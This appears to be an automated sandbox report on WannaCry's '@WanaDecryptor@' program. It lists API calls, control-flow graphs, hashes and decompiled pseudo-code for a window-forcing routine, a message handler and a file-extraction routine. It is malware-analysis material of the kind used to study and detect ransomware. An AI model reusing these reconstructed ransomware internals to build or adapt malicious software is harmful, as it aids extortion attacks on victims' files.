                                  0x00405c7b
                                  0x00405c83
                                  0x00405c8f
                                  0x00405c97
                                  0x00405ca3
                                  0x00405cab
                                  0x00405cb7
                                  0x00405cbf
                                  0x00405ccb
                                  0x00405cd3
                                  0x00405cdf
                                  0x00405ce7
                                  0x00405cf3
                                  0x00405cfb
                                  0x00405d07
                                  0x00405d0f
                                  0x00405d1b
                                  0x00405d23
                                  0x00405d2f
                                  0x00405d37
                                  0x00405d43
                                  0x00405d4b
                                  0x00405d54
                                  0x00405d5c
                                  0x00405d65
                                  0x00405d70
                                  0x00405d7f
                                  0x00405d8c

                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 3942368781-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 407a90-407ab7 179 407bf4-407c28 #2385 178->179 180 407abd-407ac5 178->180 181 407ac7 180->181 182 407aca-407ad1 180->182 181->182 182->179 183 407ad7-407af9 call 404c40 #2514 182->183 186 407b72-407bef #2414 * 2 #800 #641 183->186 187 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 183->187 186->179 187->186
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                  0x00407a96
                                  0x00407a98
                                  0x00407a9d
                                  0x00407aa2
                                  0x00407aa9
                                  0x00407ab5
                                  0x00407ab7
                                  0x00407abd
                                  0x00407ac5
                                  0x00407ac7
                                  0x00407ac7
                                  0x00407ad1
                                  0x00407add
                                  0x00407ae6
                                  0x00407af1
                                  0x00407af9
                                  0x00407afb
                                  0x00407b04
                                  0x00407b09
                                  0x00407b12
                                  0x00407b1a
                                  0x00407b27
                                  0x00407b28
                                  0x00407b2d
                                  0x00407b2f
                                  0x00407b35
                                  0x00407b3a
                                  0x00407b3c
                                  0x00407b42
                                  0x00407b47
                                  0x00407b50
                                  0x00407b55
                                  0x00407b5c
                                  0x00407b65
                                  0x00407b6d
                                  0x00407b6d
                                  0x00407b72
                                  0x00407b81
                                  0x00407b89
                                  0x00407b91
                                  0x00407b99
                                  0x00407ba2
                                  0x00407baa
                                  0x00407bae
                                  0x00407bba
                                  0x00407bc2
                                  0x00407bcb
                                  0x00407bd3
                                  0x00407bdb
                                  0x00407be4
                                  0x00407bef
                                  0x00407bef
                                  0x00407ad1
                                  0x00407bfb
                                  0x00407c09
                                  0x00407c0a
                                  0x00407c0b
                                  0x00407c0e
                                  0x00407c1b
                                  0x00407c28

                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 223 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 319 412360-412376 320 412378-41237b 319->320 321 41239c-4123a8 319->321 324 412381-412384 320->324 325 412499-4124a1 320->325 322 412414-412438 call 411810 321->322 323 4123aa-4123ad 321->323 342 41243a-412445 call 411ac0 322->342 343 41244c-412452 322->343 326 4123ba-4123c6 323->326 327 4123af-4123b7 call 411ac0 323->327 324->325 331 41238a-412399 324->331 329 4124a3-4124ab call 411ac0 325->329 330 4124ae-4124bd 325->330 336 4123c8-4123d7 326->336 337 4123da-4123dd 326->337 327->326 329->330 332 4124d1-4124d4 330->332 333 4124bf-4124ce 330->333 339 4124d6-4124dc call 411390 332->339 340 4124df-4124e4 332->340 344 4123e8-4123ed 337->344 345 4123df-4123e5 call 411390 337->345 339->340 349 4124f6-41250e call 411cf0 340->349 350 4124e6-4124f4 call 4113e0 340->350 342->343 351 412463-412465 343->351 352 412454-412460 343->352 354 4123ff-412411 call 411660 344->354 355 4123ef-4123fd call 4113e0 344->355 345->344 369 412510-412513 349->369 370 412578-41257b 349->370 350->349 360 412467-412476 351->360 361 412479-412496 351->361 354->322 355->354 373 412515-412521 369->373 374 412524-41252f 369->374 371 412589-412598 370->371 372 41257d-412584 370->372 378 41259a-41259c 371->378 379 4125ad-4125d8 371->379 377 412632-412635 372->377 375 412531-412533 374->375 376 41253f-412556 call 412250 374->376 375->376 380 412535-412537 375->380 384 412637-412646 377->384 385 41269e-4126b8 call 411660 377->385 386 4125a2 378->386 387 41259e-4125a0 378->387 381 412649-412658 379->381 382 4125da 379->382 389 412559-412575 call 412250 380->389 390 412539-41253d 380->390 393 412671-412699 wsprintfA call 412250 381->393 394 41265a-41265c 381->394 391 4125df-41260a wsprintfA call 412250 382->391 401 4126ba-4126c7 #823 385->401 402 4126cd-4126d3 385->402 395 4125a5-4125ab 386->395 387->386 387->395 390->376 390->389 408 41260d-412630 CreateFileA 391->408 393->408 394->393 399 41265e-412660 394->399 395->378 395->379 399->391 405 412666-41266b 399->405 401->402 407 4126db-4126fc call 411810 402->407 405->391 405->393 411 412728-412730 407->411 412 4126fe-412700 407->412 408->377 415 412765-41276d 411->415 413 412702 412->413 414 41273c-412744 412->414 418 412704-412718 WriteFile 413->418 419 41271a-412720 413->419 414->415 416 412776-41278f call 411ac0 415->416 417 41276f-412770 FindCloseChangeNotification 415->417 417->416 418->419 421 412732-41273a 418->421 422 412722-412724 419->422 423 412746-41275f SetFileTime 419->423 421->415 422->414 425 412726 422->425 423->415 425->407
                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t104;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t104 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0); // executed
									_t174 = _t104;
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132); // executed
									E00411660(); // executed
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000); // executed
										L00412CEC(); // executed
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268); // executed
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0); // executed
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											FindCloseChangeNotification(_t174); // executed
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}



















































                                  0x0041236a
                                  0x00412371
                                  0x00412376
                                  0x0041239c
                                  0x0041239f
                                  0x004123a6
                                  0x004123a8
                                  0x00412414
                                  0x00412431
                                  0x00412436
                                  0x00412438
                                  0x0041243d
                                  0x00412445
                                  0x00412445
                                  0x00412450
                                  0x00412452
                                  0x00412463
                                  0x00412465
                                  0x00412482
                                  0x0041248b
                                  0x0041248b
                                  0x00412496
                                  0x0041246a
                                  0x00412476
                                  0x00412476
                                  0x00412457
                                  0x00412457
                                  0x00412460
                                  0x00412460
                                  0x004123aa
                                  0x004123aa
                                  0x004123ad
                                  0x004123b2
                                  0x004123b7
                                  0x004123b7
                                  0x004123ba
                                  0x004123bc
                                  0x004123c3
                                  0x004123c6
                                  0x004123da
                                  0x004123dd
                                  0x004123e0
                                  0x004123e5
                                  0x004123e5
                                  0x004123e8
                                  0x004123ea
                                  0x004123ed
                                  0x004123f0
                                  0x004123f5
                                  0x004123f7
                                  0x004123fa
                                  0x004123fa
                                  0x00412407
                                  0x00412408
                                  0x00412409
                                  0x0041240e
                                  0x00412411
                                  0x00000000
                                  0x004123cb
                                  0x004123d7
                                  0x004123d7
                                  0x004123c6
                                  0x00412378
                                  0x0041237b
                                  0x0041249c
                                  0x0041249f
                                  0x004124a1
                                  0x004124a6
                                  0x004124ab
                                  0x004124ab
                                  0x004124ae
                                  0x004124b0
                                  0x004124b3
                                  0x004124ba
                                  0x004124bd
                                  0x004124d1
                                  0x004124d4
                                  0x004124d7
                                  0x004124dc
                                  0x004124dc
                                  0x004124df
                                  0x004124e1
                                  0x004124e4
                                  0x004124e7
                                  0x004124ec
                                  0x004124ee
                                  0x004124f1
                                  0x004124f1
                                  0x004124fd
                                  0x00412501
                                  0x00412506
                                  0x0041250e
                                  0x00412578
                                  0x0041257b
                                  0x00412589
                                  0x00412590
                                  0x00412592
                                  0x00412594
                                  0x00412596
                                  0x00412598
                                  0x0041259a
                                  0x0041259c
                                  0x004125a2
                                  0x004125a2
                                  0x0041259e
                                  0x0041259e
                                  0x004125a0
                                  0x00000000
                                  0x00000000
                                  0x004125a0
                                  0x004125a5
                                  0x004125a8
                                  0x004125a9
                                  0x004125a9
                                  0x004125b8
                                  0x004125ba
                                  0x004125be
                                  0x004125c4
                                  0x004125ca
                                  0x004125cd
                                  0x004125d4
                                  0x004125d6
                                  0x004125d6
                                  0x004125d8
                                  0x0041264d
                                  0x00412652
                                  0x00412656
                                  0x00412658
                                  0x00412671
                                  0x00412684
                                  0x00412691
                                  0x00412696
                                  0x00000000
                                  0x0041265a
                                  0x0041265a
                                  0x0041265c
                                  0x00000000
                                  0x0041265e
                                  0x0041265e
                                  0x00412660
                                  0x00000000
                                  0x00412666
                                  0x00412666
                                  0x0041266b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041266b
                                  0x00412660
                                  0x0041265c
                                  0x00000000
                                  0x004125da
                                  0x004125da
                                  0x004125df
                                  0x004125f9
                                  0x00412605
                                  0x0041260a
                                  0x0041260a
                                  0x0041260d
                                  0x0041262a
                                  0x00412630
                                  0x0041257d
                                  0x0041257d
                                  0x0041257d
                                  0x00412632
                                  0x00412635
                                  0x004126a6
